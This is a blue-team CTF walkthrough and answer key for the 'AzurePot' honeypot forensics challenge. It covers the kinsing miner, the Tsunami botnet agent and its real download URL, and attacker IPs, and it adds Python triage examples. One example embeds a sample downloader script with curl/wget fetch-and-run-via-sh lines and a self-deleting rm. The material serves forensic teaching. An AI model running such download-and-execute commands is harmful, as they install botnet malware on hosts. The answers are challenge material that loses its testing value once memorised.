AzurePot

Link : https://cyberdefenders.org/blueteam-ctf-challenges/azurepot/

Q1 File => sdb.vhd There is a script that runs every minute to do cleanup. What is the name of the file?

Answer : .remove.sh

Q2 File => sdb.vhd The script in Q#1 terminates processes associated with two Bitcoin miner malware files. What is the name of the 1st malware file?

Answer : kinsing

Q3 File => sdb.vhd The script in Q#1 changes the permissions for some files. What is their new permission?

Answer : 444

Q4 File => sdb.vhd What is the sha256 of the botnet agent file?

Answer : 0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049

Q5 File => sdb.vhd What is the name of the botnet in Q#4?

Description : https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami

Answer : tsunami

Q6 File => sdb.vhd What IP address matches the creation timestamp of the botnet agent file in Q#4?

Approach : take the created time of the file dk86 (the botnet agent from Q#4) and find the IP address whose timestamp matches it.

Q7 File => sdb.vhd What URL did the attacker use to download the botnet agent?

Answer : http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86

Q8 File => sdb.vhd What is the name of the file that the attacker downloaded to execute the malicious script and subsequently remove itself?

Answer : .install

Q9 File => sdb.vhd The attacker downloaded sh scripts. What are the names of these files?

Answer : 0_cron.sh, 0_linux.sh, ap.sh
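Q7 to Q9 come from the same triage step: pull every curl/wget URL out of the recovered shell scripts and note which of them delete themselves. The block below is an added example (not part of this write-up or the challenge files) that does that over a constructed script; the dk86 URL is the one reported in Q#7 and the names 0_cron.sh and ap.sh are from Q#9, but the script text itself, the 203.0.113.10 host and the local paths are invented.

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for a recovered downloader script. Only the dk86 URL and
# the names 0_cron.sh / ap.sh come from the write-up; everything else is invented.
SAMPLE_SCRIPT = r"""#!/bin/sh
curl -fsSL http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86 -o /tmp/dk86 || wget -q http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86 -O /tmp/dk86
chmod +x /tmp/dk86; /tmp/dk86
wget -q -O- http://203.0.113.10/0_cron.sh | sh
curl http://203.0.113.10/ap.sh | sh
rm -f "$0"
"""

# A curl/wget invocation runs up to the next pipe, semicolon or && / ||.
DL_RE = re.compile(r"\b(curl|wget)\b([^|;&\n]*)")
# A URL token ends at whitespace, quotes or shell metacharacters.
URL_RE = re.compile(r"https?://[^\s'\"|;&<>()]+")
# "rm ... $0" is the usual self-removal idiom for a dropped installer.
SELF_RM_RE = re.compile(r"\brm\b[^\n;|&]*\$0")


def extract_downloads(text):
    """Return (tool, url, host, filename) for each distinct URL fetched by curl/wget."""
    seen, out = set(), []
    for m in DL_RE.finditer(text):
        tool, args = m.group(1), m.group(2)
        for url in URL_RE.findall(args):
            if url in seen:
                continue
            seen.add(url)
            host = urlparse(url).netloc
            filename = url.rstrip("/").rsplit("/", 1)[-1]
            out.append((tool, url, host, filename))
    return out


def hosts(downloads):
    """Distinct download hosts (host:port as written in the URL)."""
    return sorted({d[2] for d in downloads})


def self_deletes(text):
    """True if the script removes its own file via $0."""
    return bool(SELF_RM_RE.search(text))


if __name__ == "__main__":
    for tool, url, host, name in extract_downloads(SAMPLE_SCRIPT):
        print(f"{tool:5} {name:12} {url}")
    print("hosts:", hosts(extract_downloads(SAMPLE_SCRIPT)))
    print("self-deleting:", self_deletes(SAMPLE_SCRIPT))
```

Run the same functions over every .sh file carved from the image (and over hidden files such as .install) to get the full list of payload names and staging hosts in one pass; the self-deletion check is what separates a dropper like .install from the scripts it fetches.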

Q10 File => UAC Two suspicious processes were running from a deleted directory. What are their PIDs?

Answer : 6388, 20645

Q11 File => UAC What is the suspicious command line associated with the 2nd PID in Q#10?

Answer : sh .src.sh

Q12 File => UAC UAC gathered some data from the second process in Q#10. What is the remote IP address and remote port that was used in the attack?

Answer : 116.202.187.77:56590

Q13 File => UAC Which user was responsible for executing the command in Q#11?

Answer : daemon

Q14 File => UAC Two suspicious shell processes were running from the tmp folder. What are their PIDs?

Answer : 15853, 21785
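Q10, Q11, Q13 and Q14 are all answered from the same two UAC artifacts: the `ls -l /proc/*/cwd` listing, where the kernel marks a working directory that no longer exists with a trailing `(deleted)`, and the NUL-separated `/proc/<pid>/cmdline` dumps. The block below is an added example (not UAC's own code and not part of this write-up) that parses a constructed listing in that shape. The PIDs, the `sh .src.sh` command line and the user daemon are the ones the write-up reports; the directory paths, timestamps and the other processes are invented.

```python
import re
from dataclasses import dataclass

# Constructed sample in the shape of UAC's "ls -l /proc/*/cwd" output.
# PIDs and the daemon user are from the write-up; paths and the other rows are invented.
CWD_LISTING = """\
lrwxrwxrwx 1 root   root   0 Dec  8 10:01 /proc/1/cwd -> /
lrwxrwxrwx 1 daemon daemon 0 Dec  8 10:02 /proc/6388/cwd -> /dev/shm/.x (deleted)
lrwxrwxrwx 1 daemon daemon 0 Dec  8 10:02 /proc/20645/cwd -> /dev/shm/.x (deleted)
lrwxrwxrwx 1 daemon daemon 0 Dec  8 10:03 /proc/15853/cwd -> /tmp
lrwxrwxrwx 1 daemon daemon 0 Dec  8 10:03 /proc/21785/cwd -> /tmp
lrwxrwxrwx 1 root   root   0 Dec  8 10:04 /proc/999/cwd -> /var/lib/apt
"""

# Constructed /proc/<pid>/cmdline contents (NUL-separated, as the kernel writes them).
# Only "sh .src.sh" for PID 20645 comes from the write-up.
CMDLINES = {
    1: "/sbin/init\0",
    6388: "./.x\0",
    20645: "sh\0.src.sh\0",
    15853: "sh\0",
    21785: "sh\0",
    999: "/usr/bin/python3\0/usr/lib/apt/apt.systemd.daily\0",
}

# perms links user group size month day time /proc/<pid>/cwd -> target
CWD_RE = re.compile(
    r"^\S+\s+\d+\s+(\S+)\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+/proc/(\d+)/cwd -> (.*)$"
)
SHELLS = {"sh", "bash", "dash", "ash"}


@dataclass
class Proc:
    pid: int
    user: str
    cwd: str
    deleted: bool
    cmdline: str


def parse_cwd_listing(listing, cmdlines):
    """Join the cwd symlink listing with the cmdline dumps into Proc records."""
    procs = []
    for line in listing.splitlines():
        m = CWD_RE.match(line)
        if not m:
            continue
        user, pid, target = m.group(1), int(m.group(2)), m.group(3)
        deleted = target.endswith(" (deleted)")
        cwd = target[: -len(" (deleted)")] if deleted else target
        # Turn the NUL-separated argv into a readable command line.
        cmdline = cmdlines.get(pid, "").rstrip("\0").replace("\0", " ")
        procs.append(Proc(pid, user, cwd, deleted, cmdline))
    return procs


def deleted_cwd_pids(procs):
    """Q10: processes whose working directory has been removed."""
    return sorted(p.pid for p in procs if p.deleted)


def tmp_shell_pids(procs):
    """Q14: shells running directly from /tmp."""
    return sorted(
        p.pid for p in procs
        if p.cwd == "/tmp" and p.cmdline.split(" ")[0].rsplit("/", 1)[-1] in SHELLS
    )


def find(procs, pid):
    """Q11/Q13: look up one process to read its command line and owner."""
    return next(p for p in procs if p.pid == pid)


if __name__ == "__main__":
    procs = parse_cwd_listing(CWD_LISTING, CMDLINES)
    print("deleted cwd:", deleted_cwd_pids(procs))
    print("shells in /tmp:", tmp_shell_pids(procs))
    p = find(procs, 20645)
    print(f"pid {p.pid} user={p.user} cmdline={p.cmdline!r}")
```

On a real UAC bundle the listing lives under live_response/process and each cmdline is its own file, so the two sample literals are replaced by a file read; the parsing and the three checks stay the same.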

Q15 File => ubuntu.20211208.mem What is the MAC address of the captured memory?

Answer : 00:22:48:26:3b:16

Q16 File => ubuntu.20211208.mem From Bash history. The attacker downloaded an sh script. What is the name of the file?

Answer : unk.sh
